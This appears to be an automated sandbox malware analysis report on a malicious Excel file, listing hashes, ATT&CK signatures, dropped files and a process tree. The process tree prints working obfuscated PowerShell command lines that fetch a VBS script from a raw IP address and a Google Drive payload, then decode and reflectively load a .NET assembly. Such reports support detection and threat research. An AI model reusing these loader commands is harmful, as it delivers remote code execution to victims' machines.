8f4cb3b0aaf0bdbbcc6d080385fab14ae0cf71d8e46770902ade7f5e4099b5da

Analysis

max time kernel
119s
max time network
127s
platform
windows7_x64
resource
win7-20241010-en
resource tags

arch:x64arch:x86image:win7-20241010-enlocale:en-usos:windows7-x64system
submitted
29-10-2024 15:28

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

0001.xls
Size

1.2MB
MD5

fb16f7b0fbcb2ae5d3b185392e4543a5
SHA1

f5e0e6247b2fd7ec74fc687ba0f63d8c05cc3fe0
SHA256

8f4cb3b0aaf0bdbbcc6d080385fab14ae0cf71d8e46770902ade7f5e4099b5da
SHA512

f20b0cd4b5030f517997783caa172e5415bfaefd38cf791c983948ae3a20967fe16840e283e6e4833f0d73d0ba7513f49e212f0bd6db7f1d9a1bf8e473668bb5
SSDEEP

24576:G1852p5l2JsykgMpRptnPskUcZnujf9VYdHk5Xqx5Q:G1O2p5l2oFpB0kUcIf9naT

Score

10^/10

defense_evasion discovery execution

Malware Config

Extracted

Language

ps1

Deobfuscated

URLs

ps1.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

exe.dropper

https://drive.google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur

Signatures

Blocklisted process makes network request 5 IoCs

flow	pid	Process
10	1128	mshta.exe
11	1128	mshta.exe
13	340	POWeRSheLL.eXE
15	2184	powershell.exe
17	2184	powershell.exe

Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs

Run Powershell and hide display window.

execution

PowerShell

T1059.001

pid	Process
2184	powershell.exe
768	powershell.exe

Evasion via Device Credential Deployment 2 IoCs

defense_evasion execution

pid	Process
2676	powershell.exe
340	POWeRSheLL.eXE

Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service

T1102

flow	ioc
14	drive.google.com
15	drive.google.com

Drops file in System32 directory 4 IoCs

description	ioc	Process
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	POWeRSheLL.eXE
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe
File opened for modification	C:\Windows\SysWOW64\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk	powershell.exe

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

System Location Discovery: System Language Discovery 1 TTPs 9 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	WScript.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	EXCEL.EXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	POWeRSheLL.eXE
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	csc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cvtres.exe

Enumerates system info in registry 2 TTPs 1 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\Hardware\Description\System\FloatingPointProcessor	EXCEL.EXE

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-2039016743-699959520-214465309-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Suspicious behavior: AddClipboardFormatListener 1 IoCs

pid	Process
2716	EXCEL.EXE

Suspicious behavior: EnumeratesProcesses 6 IoCs

pid	Process
340	POWeRSheLL.eXE
2676	powershell.exe
340	POWeRSheLL.eXE
340	POWeRSheLL.eXE
768	powershell.exe
2184	powershell.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	340	POWeRSheLL.eXE
Token: SeDebugPrivilege	2676	powershell.exe
Token: SeDebugPrivilege	768	powershell.exe
Token: SeDebugPrivilege	2184	powershell.exe

Suspicious use of SetWindowsHookEx 5 IoCs

pid	Process
2716	EXCEL.EXE
2716	EXCEL.EXE
2716	EXCEL.EXE
2716	EXCEL.EXE
2716	EXCEL.EXE

Suspicious use of WriteProcessMemory 28 IoCs

description	pid	Process	procid_target
PID 1128 wrote to memory of 340	1128	mshta.exe	32
PID 1128 wrote to memory of 340	1128	mshta.exe	32
PID 1128 wrote to memory of 340	1128	mshta.exe	32
PID 1128 wrote to memory of 340	1128	mshta.exe	32
PID 340 wrote to memory of 2676	340	POWeRSheLL.eXE	34
PID 340 wrote to memory of 2676	340	POWeRSheLL.eXE	34
PID 340 wrote to memory of 2676	340	POWeRSheLL.eXE	34
PID 340 wrote to memory of 2676	340	POWeRSheLL.eXE	34
PID 340 wrote to memory of 2956	340	POWeRSheLL.eXE	35
PID 340 wrote to memory of 2956	340	POWeRSheLL.eXE	35
PID 340 wrote to memory of 2956	340	POWeRSheLL.eXE	35
PID 340 wrote to memory of 2956	340	POWeRSheLL.eXE	35
PID 2956 wrote to memory of 2712	2956	csc.exe	36
PID 2956 wrote to memory of 2712	2956	csc.exe	36
PID 2956 wrote to memory of 2712	2956	csc.exe	36
PID 2956 wrote to memory of 2712	2956	csc.exe	36
PID 340 wrote to memory of 1752	340	POWeRSheLL.eXE	37
PID 340 wrote to memory of 1752	340	POWeRSheLL.eXE	37
PID 340 wrote to memory of 1752	340	POWeRSheLL.eXE	37
PID 340 wrote to memory of 1752	340	POWeRSheLL.eXE	37
PID 1752 wrote to memory of 768	1752	WScript.exe	38
PID 1752 wrote to memory of 768	1752	WScript.exe	38
PID 1752 wrote to memory of 768	1752	WScript.exe	38
PID 1752 wrote to memory of 768	1752	WScript.exe	38
PID 768 wrote to memory of 2184	768	powershell.exe	40
PID 768 wrote to memory of 2184	768	powershell.exe	40
PID 768 wrote to memory of 2184	768	powershell.exe	40
PID 768 wrote to memory of 2184	768	powershell.exe	40

C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE
"C:\Program Files (x86)\Microsoft Office\Office14\EXCEL.EXE" /dde C:\Users\Admin\AppData\Local\Temp\0001.xls
1⤵
- System Location Discovery: System Language Discovery
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of SetWindowsHookEx
PID:2716

C:\Windows\SysWOW64\mshta.exe
C:\Windows\SysWOW64\mshta.exe -Embedding
1⤵
- Blocklisted process makes network request
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:1128
- C:\Windows\SysWOW64\wInDoWspoWERShell\V1.0\POWeRSheLL.eXE
  "C:\Windows\SYsTEm32\wInDoWspoWERShell\V1.0\POWeRSheLL.eXE" "poWERSHelL.exe -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe ; iex($(IEx('[syStem.TeXT.eNcOdInG]'+[chAR]58+[chAr]58+'UtF8.GetstRiNg([sYstEm.conVErt]'+[cHAR]58+[ChAr]58+'FrOMbASE64stRInG('+[CHAR]34+'JFRYOHMgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELVR5UGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbWVtYmVSRGVGSU5pVGlvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJVckxtb04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENoYXJTZXQgPSBDaGFyU2V0LlVuaWNvZGUpXXB1YmxpYyBzdGF0aWMgZXh0ZXJuIEludFB0ciBVUkxEb3dubG9hZFRvRmlsZShJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBoTXR3U0FMLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlXRlFYWCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsV05uV1BtU3Vacyx1aW50ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgSURNekQsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgR0NERFpyTkJNeXUpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtTmFNRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICJhdUdtbnpkWiIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFtRVNQYWNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgS3NJQ3lpZlhzeEkgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFRYOHM6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMy4xMDEuMjEvNDEyL3NlZXRoZWJlc3R0aGluZ3NnaXZpbmdyZW5lcmd5dG9teWVudGlyZWxpZmVmb3JnZXRoZXJiYWNrLnRJRiIsIiRFTnY6QVBQREFUQVxzZWV0aGViZXN0dGhpbmdzZ2l2aW5ncmVuZXJneXRvbXllbnRpcmVsaWZlZm9yZ2V0aC5WQnMiLDAsMCk7U3RBUnQtc2xlZXAoMyk7c3RBUlQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVuVjpBUFBEQVRBXHNlZXRoZWJlc3R0aGluZ3NnaXZpbmdyZW5lcmd5dG9teWVudGlyZWxpZmVmb3JnZXRoLlZCcyI='+[cHAr]0x22+'))')))"
  2⤵
  - Blocklisted process makes network request
  - Evasion via Device Credential Deployment
  - Drops file in System32 directory
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of WriteProcessMemory
  PID:340
- - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
    "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EX byPAss -NOp -w 1 -C DEVicEcREdeNTiaLDEpLoyMENt.Exe
    3⤵
    - Evasion via Device Credential Deployment
    - Drops file in System32 directory
    - System Location Discovery: System Language Discovery
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious use of AdjustPrivilegeToken
    PID:2676
- - C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe
    "C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\eeau9sby.cmdline"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2956
  - - C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe
      C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RES6633.tmp" "c:\Users\Admin\AppData\Local\Temp\CSC6632.tmp"
      4⤵
      System Location Discovery: System Language Discovery
      PID:2712
- - C:\Windows\SysWOW64\WScript.exe
    "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\seethebestthingsgivingrenergytomyentirelifeforgeth.VBs"
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:1752
  - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'JigoR2VULVZBUmlhQmxFICcqbURSKicpLk5BTUVbMywxMSwyXS1KT0luJycpKCAoKCc3JysnVk1pbWFnZVVybCA9IHptd2h0dHBzOi8vZHJpdmUuJysnZ29vZ2xlLmNvbS91Yz9leHBvcnQ9ZG93bmxvYWQmaWQ9MUFJVmdKSkp2MUY2dlM0c1VPeWJuSC1zRHZVaEJZd3VyIHptdzs3Vk13ZWJDbGknKydlbnQgPSBOZXctT2JqZWN0JysnIFN5c3RlbS5OZXQuV2ViQ2xpZW50OzdWTWknKydtYWdlQnl0ZXMgPSA3Vk13ZWJDbGllbnQuRG93bmxvYWREYXRhKDdWTWltYWdlVXJsKTs3Vk1pbWFnZVRleHQgPSAnKydbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVCcrJ0YnKyc4LkdldFN0cmluZyg3Vk1pbWFnZUJ5dGVzKTs3Vk1zdGFydEZsYWcgPSB6bXc8PEJBUycrJ0U2NF9TVEFSVD4+em13OzdWTWVuZEZsYWcgPSB6bXc8PEJBU0U2JysnNF9FTkQ+Pnptdzs3Vk1zdGFydEluJysnZGV4ID0gNycrJ1ZNaW1hZ2VUZXh0LkluZGV4T2YoN1ZNc3RhcnRGbGFnKTs3Vk1lbmRJbmRleCA9IDdWTWltYWcnKydlVGV4dC5JbmRleE9mKDdWTWVuZEZsYWcpOzdWTXN0JysnYXJ0SW5kZXggLScrJ2dlIDAgLWFuZCA3Vk1lbmRJbmQnKydleCAtZ3QgN1ZNc3RhcnRJbmRleCcrJzs3Vk1zdGFydEluZGV4ICs9IDdWTXN0YXJ0RmxhZy5MZW5ndGg7N1ZNJysnYmFzZTY0TGVuZ3RoID0gJysnNycrJ1ZNZW5kSW5kZXggLSA3VicrJ01zdGEnKydydEluZGV4OzdWTWJhc2U2NENvbW1hbmQgPSA3Vk1pbWFnZVRleHQuU3ViJysnc3RyaW5nKDdWTXN0YXJ0SW5kZXgsIDdWTWJhc2U2NExlbmd0aCk7N1ZNJysnYmFzZTY0UmV2ZXJzZWQgPSAtam9pbiAoN1YnKydNYicrJ2FzZTY0Q29tbWFuZC5Ub0NoYXJBcnJheSgpIHJwOCBGb3JFYWNoLU9iamVjdCB7IDdWTV8gfSlbLTEuLi0oN1ZNYmEnKydzZTY0Q29tbWFuZC5MZW5ndGgpXTs3Vk1jb21tYW5kQnl0ZXMgPSBbU3lzdGVtLkNvbnZlcnRdOjpGcm8nKydtQmFzZTY0U3RyaW5nKDdWTWJhc2U2NFJldmVycycrJ2VkKTs3Vk0nKydsb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoN1ZNY29tbWFuZEJ5dGVzKTs3Vk12YWlNZXRob2QgPSBbZG5saWIuSU8uSG9tZV0uR2V0TWV0aG9kKHptd1ZBSXptdyk7N1ZNdmFpTWV0aG9kLkludm9rZSg3Vk1udWxsLCAnKydAKHptd3R4dC5UVFInKydDTUxMLzIxNC8xMi4xJysnMDEuMy4yOTEvLzpwdHRoem13LCB6bXdkZXNhdGl2YWRvem13LCB6bXdkZXNhdGl2YScrJ2Rvem13LCB6bXdkZXNhdGl2YWRvem13LCB6bXdDYXNQb2x6bXcsIHptd2Rlc2F0aXZhZCcrJ296bXcsIHptd2Rlc2F0aXZhZG96bXcsem13ZGVzYXRpdmFkb3ptdyx6bXdkZXNhdGl2YWRvem13LHptd2Rlc2F0aXYnKydhZG96bXcsem13ZGVzYXRpdmFkb3ptdyx6bXdkZXNhdGl2JysnYWRveicrJ213LHptdzF6bXcsem13ZGVzYXRpdmFkb3ptdykpOycpICAtckVQbEFDZSAncnA4JyxbQ0hhcl0xMjQgIC1jcmVQbGFDRSAgKFtDSGFyXTEyMitbQ0hhcl0xMDkrW0NIYXJdMTE5KSxbQ0hhcl0zOS1jcmVQbGFDRShbQ0hhcl01NStbQ0hhcl04NitbQ0hhcl03NyksW0NIYXJdMzYpKQ==';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
      4⤵
      Command and Scripting Interpreter: PowerShell
      Drops file in System32 directory
      System Location Discovery: System Language Discovery
      Suspicious behavior: EnumeratesProcesses
      Suspicious use of AdjustPrivilegeToken
      Suspicious use of WriteProcessMemory
      PID:768
    - - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command "&((GeT-VARiaBlE '*mDR*').NAME[3,11,2]-JOIn'')( (('7'+'VMimageUrl = zmwhttps://drive.'+'google.com/uc?export=download&id=1AIVgJJJv1F6vS4sUOybnH-sDvUhBYwur zmw;7VMwebCli'+'ent = New-Object'+' System.Net.WebClient;7VMi'+'mageBytes = 7VMwebClient.DownloadData(7VMimageUrl);7VMimageText = '+'[System.Text.Encoding]::UT'+'F'+'8.GetString(7VMimageBytes);7VMstartFlag = zmw<<BAS'+'E64_START>>zmw;7VMendFlag = zmw<<BASE6'+'4_END>>zmw;7VMstartIn'+'dex = 7'+'VMimageText.IndexOf(7VMstartFlag);7VMendIndex = 7VMimag'+'eText.IndexOf(7VMendFlag);7VMst'+'artIndex -'+'ge 0 -and 7VMendInd'+'ex -gt 7VMstartIndex'+';7VMstartIndex += 7VMstartFlag.Length;7VM'+'base64Length = '+'7'+'VMendIndex - 7V'+'Msta'+'rtIndex;7VMbase64Command = 7VMimageText.Sub'+'string(7VMstartIndex, 7VMbase64Length);7VM'+'base64Reversed = -join (7V'+'Mb'+'ase64Command.ToCharArray() rp8 ForEach-Object { 7VM_ })[-1..-(7VMba'+'se64Command.Length)];7VMcommandBytes = [System.Convert]::Fro'+'mBase64String(7VMbase64Revers'+'ed);7VM'+'loadedAssembly = [System.Reflection.Assembly]::Load(7VMcommandBytes);7VMvaiMethod = [dnlib.IO.Home].GetMethod(zmwVAIzmw);7VMvaiMethod.Invoke(7VMnull, '+'@(zmwtxt.TTR'+'CMLL/214/12.1'+'01.3.291//:ptthzmw, zmwdesativadozmw, zmwdesativa'+'dozmw, zmwdesativadozmw, zmwCasPolzmw, zmwdesativad'+'ozmw, zmwdesativadozmw,zmwdesativadozmw,zmwdesativadozmw,zmwdesativ'+'adozmw,zmwdesativadozmw,zmwdesativ'+'adoz'+'mw,zmw1zmw,zmwdesativadozmw));') -rEPlACe 'rp8',[CHar]124 -crePlaCE ([CHar]122+[CHar]109+[CHar]119),[CHar]39-crePlaCE([CHar]55+[CHar]86+[CHar]77),[CHar]36))"
        5⤵
        Blocklisted process makes network request
        Command and Scripting Interpreter: PowerShell
        Drops file in System32 directory
        System Location Discovery: System Language Discovery
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:2184

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Command and Scripting Interpreter

T1059

PowerShell

T1059.001

Persistence

Privilege Escalation

Defense Evasion

Modify Registry

T1112

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Web Service

T1102

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
1KB

MD5
67e486b2f148a3fca863728242b6273e

SHA1
452a84c183d7ea5b7c015b597e94af8eef66d44a

SHA256
facaf1c3a4bf232abce19a2d534e495b0d3adc7dbe3797d336249aa6f70adcfb

SHA512
d3a37da3bb10a9736dc03e8b2b49baceef5d73c026e2077b8ebc1b786f2c9b2f807e0aa13a5866cf3b3cafd2bc506242ef139c423eaffb050bbb87773e53881e

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B46811C17859FFB409CF0E904A4AA8F8

Filesize
436B

MD5
971c514f84bba0785f80aa1c23edfd79

SHA1
732acea710a87530c6b08ecdf32a110d254a54c8

SHA256
f157ed17fcaf8837fa82f8b69973848c9b10a02636848f995698212a08f31895

SHA512
43dc1425d80e170c645a3e3bb56da8c3acd31bd637329e9e37094ac346ac85434df4edcdbefc05ae00aea33a80a88e2af695997a495611217fe6706075a63c58

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\8B2B9A00839EED1DFDCCC3BFC2F5DF12

Filesize
174B

MD5
c8e8786e843a646ff4db0f944c4c3885

SHA1
224286ce8112c010e3e7cf6ad3ce85bb33574c90

SHA256
77f3a1f3eae2f18210d6bcc220e8ba0e2746180c4a9bb0577e16b5d0dfc37de3

SHA512
591ae75bfcea84b8aec8ec948f4a3953e556567053f5f66d474d41338c5cfa7c07c230f6387611d71dffd875057da499c48e1b38254c05c4f9ca4cac5d26c45f

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\94308059B57B3142E455B38A6EB92015

Filesize
342B

MD5
4f1d9b18fdc8786c08f8968140f9aad4

SHA1
b4520b3eb528f69a60788baa16b9e1662d4fe134

SHA256
ce71c89b091f94f430d2694cc75b137746fcc79a4713ac41b02fc1d0ce4d6925

SHA512
8c3b8ea624a7d29cb5689be3aaa77fe14749c6e0934b156565717b9af84f0c1899c37fc4d235c7b7046aebc26bfe777677ed2e2495bf5e3804836e21be759621

Download Submit
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B46811C17859FFB409CF0E904A4AA8F8

Filesize
170B

MD5
b353347a075f669c23bde5e25c69a713

SHA1
288a2802d8a0c168e75aa244a361d22a1f76276a

SHA256
f13c85682a8b3c8c4fb0253cffa6438b3aa7a050d5d2d322e4368b37ba09e0a4

SHA512
19b9e10fde0a3091087e86fa6881e673e0b425dfb4e58a01f251013b33c1a40a5c7a7895c42e939683955a82d1a507d5e0c993d9604205454511993c8e05dbc6

Download Submit
C:\Users\Admin\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5GWW47WY\seemybestthingwhichigiventouformakebestappinesswogiven[1].hta

Filesize
8KB

MD5
6c019b315ecf7e84d0cfc31db20b59e4

SHA1
15514a1c510ff845bae7b19b9712b42464d0cd40

SHA256
33cac963bd5b88e6636ad558805fa71503b7340ec443b0a516517d71cec7b56e

SHA512
09a5d350dcafab960b0132de8209fa3e015fa0af56637584439246c0bc41fcf5bf61c399aa36f21aca1f8e6403afc53684278851fe574b8527fee53dd6fdb9f9

Download Submit
C:\Users\Admin\AppData\Local\Temp\Cab5A9E.tmp

Filesize
70KB

MD5
49aebf8cbd62d92ac215b2923fb1b9f5

SHA1
1723be06719828dda65ad804298d0431f6aff976

SHA256
b33efcb95235b98b48508e019afa4b7655e80cf071defabd8b2123fc8b29307f

SHA512
bf86116b015fb56709516d686e168e7c9c68365136231cc51d0b6542ae95323a71d2c7acec84aad7dcecc2e410843f6d82a0a6d51b9acfc721a9c84fdd877b5b

Download Submit
C:\Users\Admin\AppData\Local\Temp\RES6633.tmp

Filesize
1KB

MD5
6864f867bb061beade6510a13677e3a7

SHA1
87cf121afeeed5949226842d9d009abc06363f1d

SHA256
f3adb76f8375975b02ea097171239df5c6e76a2bf1e38ed582aff0ae8740ce4a

SHA512
c13954a0419b2bcd628bace500ff3b7c11a094f7f718c52f4f84d40693b25ae3faed299eeec9df6b58644bc85d5dda57f494994ef995c55f652d5b5727f5690b

Download Submit
C:\Users\Admin\AppData\Local\Temp\eeau9sby.dll

Filesize
3KB

MD5
53e5c8702c75bbcf20d83da85803fc1e

SHA1
34469f82b965621e6c5aa27834e2412d6655243b

SHA256
2689f8a8368e65d93b765cc1b9b4f53dd3aaff8d0c53746652e6639cae1c5c01

SHA512
c0a9c22c6232885f0fcd632774ad767fd6a45ee34dc5da515edb44954a5874bed0b4c37822716a776c4ff8c5ea4ac90721cb6dd784467adfb584b824b6c7607f

Download Submit
C:\Users\Admin\AppData\Local\Temp\eeau9sby.pdb

Filesize
7KB

MD5
143cbe92cf94a3d6eccfce7a8bb8b0fd

SHA1
a69c5dab7fec1231a577e55f2b438c900cc50646

SHA256
0b7dd8f57ea5662b5032b1e5531e9bbda4edba645f9cee164d404c826a6cfdee

SHA512
df95709d0a63dd44e22d5e70343f143cd911db40b7030a556732a37d745ccb5d95eaf563d70739844f1090cdda1a3600c4239821763744edc2f8e795f1cccc34

Download Submit
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms

Filesize
7KB

MD5
af9cc94cd1716e561f168dcf7d0b322e

SHA1
09c9ed6467f8dea411222dc8aa87439c3ea608a7

SHA256
c18b8cee863f2b1449b980888aedebd7994b6509ec6636a2489d9d009e3138f4

SHA512
663f224122d51b20ddb8f273677b50d0d29a43bad4fe7428ee467ab8e8ef5632ee64788c920c81c51e01c7480892244d744d0e5d9597b1014ca69a815b2b6116

Download Submit
C:\Users\Admin\AppData\Roaming\seethebestthingsgivingrenergytomyentirelifeforgeth.VBs

Filesize
138KB

MD5
87f50d339477dd3708f80a5e286fea7e

SHA1
f35d36f7b3b9ed4552509f7ef915bc22bb43c310

SHA256
dd648d14e67dbf28a2bdd7ed56288147b7a2f5b5d1dfba56ecb9975fc745c527

SHA512
4c9b7579da6c594d8511e8a75a5b7b812d938c2f37a9c5cf0943203950f112e93ace9a3d210cc2b0b0c8cdfd4781a84e545295b766ccaa60a18509f78620d2a3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\CSC6632.tmp

Filesize
652B

MD5
898aa22a51ef38b81650f68b57eb1d93

SHA1
2fee8ff672547e9d7ccfe4ff165b4e23106eb4d0

SHA256
e0f05888a88149039cd0554a11d3ad20ebb3b719ed680e395391e834e88a3dc5

SHA512
dc49bbda0a2a6e4d3c917fb3efae92e4c1b43a0dec3ce54bf1a04fcb247bba900ebee31d14344d5f5a12c674dcd43af542c8069ff3ab90bed0d1151abf9f5ae3

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eeau9sby.0.cs

Filesize
474B

MD5
5cb8ee8ceb5d933395268bbc87232d70

SHA1
32b432c7fbd48854320ff5a049ac16f5bce1dd34

SHA256
d0b54b8ed299319fcc1a25eb38cbbeec96c9cc7232d8d8ace1eb34b0ee73c5a2

SHA512
fdcdc9784f4cb577853fbb338c8d2acf4e489ab0e27c0a2e10f9d969f20a57ef385a947aa4b93bdf2785212f0e8263cdeae153d7440dbe26841e1da94be713f4

Download Submit
\??\c:\Users\Admin\AppData\Local\Temp\eeau9sby.cmdline

Filesize
309B

MD5
6baf6aa1e43eb11f19e1fb4015eb5099

SHA1
0034966bb954ff2818daa77c9ed2861632ecff25

SHA256
381c446e38b2aa33926140f4cbb322e4ba9f9aa690b1e2ef5ee1e333f027a0e5

SHA512
98317c3d5b6700cfde7ccf98a53068e5ff75aa76329dd383045dd63a34420f0901393296d6dd15e4375f10ea47616bda8c90dc50d6bb4b89d1ce1dfe6fd98ed2

Download Submit
memory/1128-18-0x00000000029D0000-0x00000000029D2000-memory.dmp

Filesize
8KB

Download
memory/2716-0-0x000000005FFF0000-0x0000000060000000-memory.dmp

Filesize
64KB

Download
memory/2716-19-0x0000000002D90000-0x0000000002D92000-memory.dmp

Filesize
8KB

Download
memory/2716-1-0x0000000072D8D000-0x0000000072D98000-memory.dmp

Filesize
44KB

Download
memory/2716-76-0x0000000072D8D000-0x0000000072D98000-memory.dmp

Filesize
44KB

Download